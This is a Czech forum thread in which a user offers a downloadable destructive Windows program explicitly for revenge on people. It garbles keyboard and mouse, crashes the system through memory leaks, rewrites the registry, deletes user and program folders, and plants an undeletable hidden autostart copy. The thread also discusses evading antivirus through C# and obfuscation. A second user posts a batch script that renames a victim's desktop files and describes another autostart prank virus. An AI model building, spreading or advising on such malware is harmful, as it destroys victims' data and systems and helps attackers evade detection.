Jump to content

Malware na zakázku


mimic

Recommended Posts

Zdravim,

dělal jsem pár scriptů do API a rovnou mě napadlo, že bych mohl udělat nějakej "malware". Kdysi to po mě někdo chtěl, tak jsem udělal novou verzi.

Mě osobně se to moc nehodí, ale pokud mátě někoho, koho nesnášíte nebo se chcete pomstít, ukázat mu peklo na zemi, tak půžete použít :-)

 

Celá app se zkládá z několika kroků, které jsou časově odděleny. Nebudu tady popisovat detaily co to dělá, ale ve stručnosti:

 

- proháže písmena na klávesnici, některé zakáže, některé začnou generovat náhodný znaky apod.

- "skoro" znemožní používat myš (začně divoce poskakovat po monitoru)

- ikony na ploše začnou hrát hru "chodí pešek okolo" (náhodný chování ikon)

- vysype koš

- začně do procesu explorer generovat memory leaky dokud system neskolabuje (50mb za 1s)

- přegeneruje registry (uprávy vzhledu, nastavení, vygeneruje přes 100 nových app po spuštění - potom to vypadá jako v matrixu (problikává samí okno))

- diody na klávesnici se změní na styl "night-rider", kde začnou vydávat zvuky, které se budou zrychlovat (psycho)

- promaže některé adresáře, jako dokumenty, program files apod.

 

Bylo to testováno na Win 7 i nově Win 10

 

PS: Mám i API v podobě libky, která obsahuje všechny tyhle funkce + winapi a další nativní a pomocné metody, takže kdyby někdo chtěl...

Chci tam potom ještě dodělat anonymní odesílání emailů na předem definovanou adresu.

 

Download: http://uloz.to/xWwtshxC/tweak-exe

Link to comment
Share on other sites

celkem vtipna appka podle popisu :d zkouset ji nebudu, nemam momentalne masinu o kterou chci prijit a srat se s jeji obnovou :d

 

ale zajima me, jak to mas zabezpeceny proti detekci antivirakem? krome toho casovyho intervalu.

Link to comment
Share on other sites

celkem vtipna appka podle popisu :d zkouset ji nebudu, nemam momentalne masinu o kterou chci prijit a srat se s jeji obnovou :d

 

ale zajima me, jak to mas zabezpeceny proti detekci antivirakem? krome toho casovyho intervalu.

co virtual pc ? :)

Link to comment
Share on other sites

taky jsem delal par viru :d ale "neskodnych" proste spise pro provokaci a pro srandu :) protoze by mi bylo lito te osoby, ktera by to spustila a mela by ko windows ci data dulezita a tak... tehdy jsem si vystrelil z kamose,  poslal jsem mu exe, co obsahoval bat soubor, ktery mu prejmenoval vsecky soubory na plose na sifry, v jeho pripade mel plnou plochu souboru, mel v tom totalni zmatek, navic kdyz ten script smazal i pripony souboru, tudiz ty soubory nemely ani ikonu :d misto treba mod_sa_mp_03c.exe tam bylo $ßd¤ßałŁ0.łŁß :d jednoduchy bat script :)

echo off
cls
rename %systemdrive%/Documents and Settings/%username%/Plocha/*.*  $ß?¤ß?łŁ?.łŁß

jak mnozi vi, tak v msdosu pouziti otazniku v techto pripadech ponecha na urcitem miste vami zvolenem puvodni pismenko/cislici

 

 

potom jsem zacal delat projekt homo-virus :d

tento projekt jsem delal v aplikaci game maker, dal jsem tam fotku teplych kluku :d aby to uzivatele co nejvice nasvalo :d a aby to nemohl jenom tak zakryt jinym oknem, dal jsem tma opakovani mid hudby ze simpsnu, aby se toho jen tak nezbavil, dal jsem tam prikaz zapsat samospusteni do registru po startu windowsu... aby mel sanci a moznost se viru jednoduse zbavit, dal jsem tam klic, ktery kdyz vlozi do toho homo-viru, vir se automaticky sam smaze kompletne z pc :)

DOWNLOAD HOMO-VIRUS ZDE

 

no pak ode me nikdo nechtel nic prijimat :d

Edited by ĐaVe
Link to comment
Share on other sites

Om3n

Antivirák neřešim, je to psaný v C#, takže nedetekovatelný.. bylo do detekovaný jen případě, že jsem používal rootkit z c++ jako embeded source, ale ten tady není

ĐaVe

Jo, to se mi kdysi dávno taky stalo, potřeboval jsem něco otestovat a z nějakýho důvodu si mě smazal z kontaktu :-D A přitom to bylo poměrně neškodný, teda.. vlastně to byl trojan, takže se místama divil, že PC dělá něco jinýho než obvykle

eXpresS<-Unnamed

Vážně? :-D Jak jsem říkal, pokud by byl zájem, tak můžu poskytnou statickou libku, co obsahuje všechny tyhle "featury".

 

PS: Zapoměl jsem doplnit, že si ještě app vytvoří svojí kopii pečlivě ukrytou a pozměněnou a automaticky se spouští po startu s rychlejší odezvou než poprvé. Celkem pěkná vlastnost je, že na žádnou funkci není potřeba lokální administrátor! A dokonce ta kopie nejde smazat ani samotným administrátorem! :-D

Edited by mimic
Link to comment
Share on other sites

no virustotal rika neco jinyho :d nekolik AV to podle nej detekovalo jako virus.

nedetekovatelny protoze to je v C#? nejsem zadnej expert na C# ale neni to kravina? v dnesni dobe to antivirak nejdriv spusti v sandboxu a urcitou dobu prvniho spusteni sleduje jestli ten program nedela neco osklivyho. a podobny metody.

 

ps: zkousel to nekdo otestovat primo antivirakem v PC?

Link to comment
Share on other sites

Otestovat antivirem jsem to nezkoušel, ale vzhledem k tomu, že to je celý obfuskovaný, tak to hodí nějaký warningy:

https://www.virustotal.com/cs/file/0069d74b824ee22f39cac8c7063bce35c907468ab4c01b84f9fb7bc2d5085f9f/analysis/

 

Zkoušel jsem ještě čistou knihovnu a tam je 1 hrozba z 57, konkrétně "Mal/MSIL-BM" což je paradoxně warning na C# api :-D

To samí jsem zkoušel s čistou binárkou a tam je dokonce o 1 hrozbu víc než ve finální verzi.. nechápu jak to vyhodnocuje, ale v zásadě tam jsou samí MSIL warningy, což je v pohodě.. akorát nechápu, jak se tam dostal "Trojan.Win32.Qudamah.Gen.18" O_o

 

Jinak ano, většinou všechno co napíšeš v .NET je bez detekce viru, to by se ani M$ nelíbilo, kdyby jim jejich API detekovaly antiviráky.. já tam v podstatě dělám jen volání metod a nějakou logiku, aby to bylo detekovaný, tak to musí najít přímo kus zdrojáku, kterej je v AV databázi... takže pokud stejný chování napíšeš v C# tak to nemusí být detekovaný jako kdyby si ho napsal třeba v C++

Edited by mimic
Link to comment
Share on other sites

Hezká appka, ale mám jeden dotaz. Má napadený uživatel nějakou šanci to zastavit? Co kdyby si už i samotný útočník, řekl, že jeho oběť trpí dost a chtěl by ho od viru osvobodit? Má nějakou šanci? :d

 

Tak stačí, když jí odebere z aplikací, který se spouští po spuštění PC. Jinak pokud se již spustí, tak je to težší, musí mít po ruce nějakej externí nástroj na zabíjení procesů a musí najít onen proces a zabít ho dřív nez ztratí kontrolu nad klávesnicí, myší a potom pamětí.. Je to TimeBattle ;-)

 

Ona samotná app má trochu jiný chování, když jí pustí uživatel a administrátor.. co se týče úprav v registrech.. při adminu mění i informace i systému a hlavně se tyhle všechny změny dotknou všech uživatelů.

Jaj.. myslim, že jsem to trochu přehnal... jsem si zkusil vygenerovat UML diagram a má rozměry 36691x5828 a skoro 10mb :-D

Pokud je někdo zvědavej tak: http://uloz.to/xa2Xqkny/classdiagram1-png (je to jen knihovna)

 

Celá app včetně ty libky mi trvala asi 2-3 týdny večerního času...

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...